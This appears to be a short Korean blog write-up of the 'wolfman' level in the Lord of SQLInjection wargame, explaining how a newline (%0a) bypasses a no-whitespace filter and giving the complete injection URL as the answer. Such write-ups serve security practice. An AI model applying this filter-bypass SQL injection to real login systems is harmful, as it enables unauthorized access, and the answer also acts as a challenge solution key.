본문 바로가기
Hacking/LOS

[LOS] 5. wolfman

YAWP 2023. 7. 6. 18:33
728x90
반응형

 

  • 약간 쉬어가는(?) 느낌적인 문제
  • 아래의 코드를 보면 공백이 들어가면 필터링에 걸리기 때문에 이를 %0a로 우회해서 id=admin만 되면 문제가 풀린다.
  if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

 

답: https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw=%27%0aor%0aid=%27admin%27%23

 

 

 

728x90
반응형

'Hacking > LOS' 카테고리의 다른 글

[LOS] 7. orge  (0) 2023.07.06
[LOS] 6. darkelf  (0) 2023.07.06
[LOS] 4. orc  (5) 2023.07.05
[LOS] 3. goblin  (0) 2023.07.05
[LOS] 2. cobolt  (0) 2023.07.05

'Hacking/LOS' Related Articles

티스토리툴바